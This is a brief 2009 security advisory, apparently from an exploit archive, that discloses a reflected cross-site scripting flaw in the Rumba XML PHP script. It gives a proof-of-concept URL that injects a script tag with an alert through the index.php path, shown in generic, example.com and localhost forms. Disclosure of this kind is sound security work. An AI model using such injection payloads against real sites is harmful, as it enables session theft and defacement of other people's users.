Related information
Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)
phpPollScript - 1.3 Remote File Include
SMF (Simple Machine Forum) 1.1.11 XSS - Discovered by : Khashayar Fereidani
[ISecAuditors Security Advisories] PHP-Calendar <= v1.1 'configfile' Remote and Local File Inclusion vulnerability
[ISecAuditors Security Advisories] Simple PHP Blog <= 0.5.1 Local File Include vulnerability

From: hadikiamarsi_(at)_hotmail.com <hadikiamarsi_(at)_hotmail.com>
Date: 21.12.2009
Subject: Rumba XML XSS vulnerability

###########################################
#
# Script Name : Rumba XML ( All Version )
#
# Bug Type : XSS vulnerability
#
# Found by : Hadi Kiamarsi
#
# Contact : hadikiamarsi [at] hotmail.com
#
# Download : http://download.softpedia.ro/dl/4bf8d3951ea08865afb7c98b8c0476fa/4b2a1ca9/6000564 63/webscripts/PHP/xml18eng.zip
#
###########################################

PoC :
http://[target]/[path]/index.php/>"><script>alert('Hadi Kiamarsi')</script>

example :
http://www.example.com/index.php/>"><script>alert('Hadi Kiamarsi')</script>

local Example :
http://localhost/index.php/>"><script>alert('Hadi Kiamarsi')</script>